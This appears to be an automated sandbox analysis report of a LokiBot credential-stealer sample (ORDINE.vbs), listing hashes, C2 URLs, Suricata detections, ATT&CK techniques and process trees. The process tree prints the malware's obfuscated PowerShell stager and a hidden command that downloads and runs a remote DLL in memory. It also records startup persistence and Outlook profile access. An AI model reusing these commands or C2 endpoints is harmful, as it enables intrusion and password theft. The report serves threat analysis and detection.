lokibot | abb023216cf01005730aefe0b0948043285674f51036ab6c568bb76c49ac438c

General

Target

ORDINE.vbs
Size

231KB
MD5

e020cd23ba91c3f6ad9c9ed3d6f391b5
SHA1

c924b29e61a4765cee969e841a76e304b646c168
SHA256

d985cfc667c76c46662c1de784d8d8844af661f9fe421ab9f0a4f8d704002738
SHA512

6f01979834b8de6979bb485edaff44079ca58923b2e333e6e089ef76f73b13e6b5c51d2220163c0a216bc1f5576be4c0fc30867743e7f1ef70054868b083ff86

Score

10^/10

lokibot collection spyware stealer suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://20.7.14.99/dll/14-07-2022.mp4

Extracted

Family

lokibot

C2

http://vlascx.xyz/luck/cx/kai.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
suricata
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2
suricata
suricata: ET MALWARE LokiBot Checkin
suricata: ET MALWARE LokiBot Checkin
suricata
suricata: ET MALWARE LokiBot Fake 404 Response
suricata: ET MALWARE LokiBot Fake 404 Response
suricata
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M1
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M1
suricata
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M2
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M2
suricata
suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)
suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)
suricata
suricata: ET MALWARE Powershell commands sent B64 3
suricata: ET MALWARE Powershell commands sent B64 3
suricata
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

1 2180 powershell.exe
2 2180 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation WScript.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe

flow	pid	process
1	2180	powershell.exe
2	2180	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

cvtres.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	cvtres.exe
Key opened	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	cvtres.exe
Key opened	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	cvtres.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2180 set thread context of 3196 2180 powershell.exe cvtres.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1056 powershell.exe
1056 powershell.exe
2180 powershell.exe
2180 powershell.exe
536 powershell.exe
536 powershell.exe

description	pid	process	target process
PID 2180 set thread context of 3196	2180	powershell.exe	cvtres.exe

pid	process
1056	powershell.exe
1056	powershell.exe
2180	powershell.exe
2180	powershell.exe
536	powershell.exe
536	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.execvtres.exe

description	pid	process
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	2180	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	3196	cvtres.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 804 wrote to memory of 1056	804	WScript.exe	powershell.exe
PID 804 wrote to memory of 1056	804	WScript.exe	powershell.exe
PID 1056 wrote to memory of 2180	1056	powershell.exe	powershell.exe
PID 1056 wrote to memory of 2180	1056	powershell.exe	powershell.exe
PID 2180 wrote to memory of 536	2180	powershell.exe	powershell.exe
PID 2180 wrote to memory of 536	2180	powershell.exe	powershell.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe
PID 2180 wrote to memory of 3196	2180	powershell.exe	cvtres.exe

outlook_office_path 1 IoCs

Processes:

cvtres.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	cvtres.exe

outlook_win_path 1 IoCs

Processes:

cvtres.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ORDINE.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DI⁂M⁂⁂u⁂Dc⁂Lg⁂x⁂DQ⁂Lg⁂5⁂Dk⁂LwBk⁂Gw⁂b⁂⁂v⁂DE⁂N⁂⁂t⁂D⁂⁂Nw⁂t⁂DI⁂M⁂⁂y⁂DI⁂LgBt⁂H⁂⁂N⁂⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂HY⁂5wBJ⁂Fc⁂TwBl⁂EI⁂U⁂BM⁂Eo⁂VQDH⁂Gg⁂dwB4⁂C4⁂Z⁂BV⁂HU⁂c⁂Bq⁂FU⁂TQBn⁂GM⁂ZQBR⁂FU⁂xwBQ⁂G4⁂Jw⁂p⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂Ew⁂T⁂Bw⁂Fc⁂VwBx⁂E8⁂a⁂BI⁂Fg⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB3⁂G8⁂bgBr⁂C8⁂Ng⁂y⁂DI⁂Lg⁂2⁂DQ⁂Mg⁂u⁂DI⁂OQ⁂x⁂C4⁂Mg⁂x⁂DI⁂Lw⁂v⁂Do⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂KQ⁂=';$OWjuxD = [System.Text.encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/14-07-2022.mp4'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('vçIWOeBPLJUÇhwx.dUupjUMgceQUÇPn').GetMethod('LLpWWqOhHX').Invoke($null, [object[]] ('txt.wonk/622.642.291.212//:ptth'))"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3196

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3de5056547a2b5039ab8b93b4a224b2e

SHA1
47067a14fe0854189f90d6b9609bd51666ca0dbb

SHA256
22f7d2a696927163d7fa467aa3289060a17e521b4184bfd13e808ef4195ed59a

SHA512
1527f92d0820a23696fa05d67ec19bb7be2aac3f0a745dbf1d4d7ae4c7b228d2f477ed95b79141eb43013f8ce67dc8a5c23a72bd08f0e510a6ff99e7fff98520

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
memory/536-137-0x0000000000000000-mapping.dmp

Download
memory/536-138-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp

Filesize
10.8MB

Download
memory/536-139-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp

Filesize
10.8MB

Download
memory/1056-133-0x000001C2E0830000-0x000001C2E0852000-memory.dmp

Filesize
136KB

Download
memory/1056-146-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp

Filesize
10.8MB

Download
memory/1056-135-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp

Filesize
10.8MB

Download
memory/1056-132-0x0000000000000000-mapping.dmp

Download
memory/2180-144-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp

Filesize
10.8MB

Download
memory/2180-136-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp

Filesize
10.8MB

Download
memory/2180-134-0x0000000000000000-mapping.dmp

Download
memory/3196-141-0x00000000004139DE-mapping.dmp

Download
memory/3196-140-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3196-148-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3196-149-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/3196-150-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads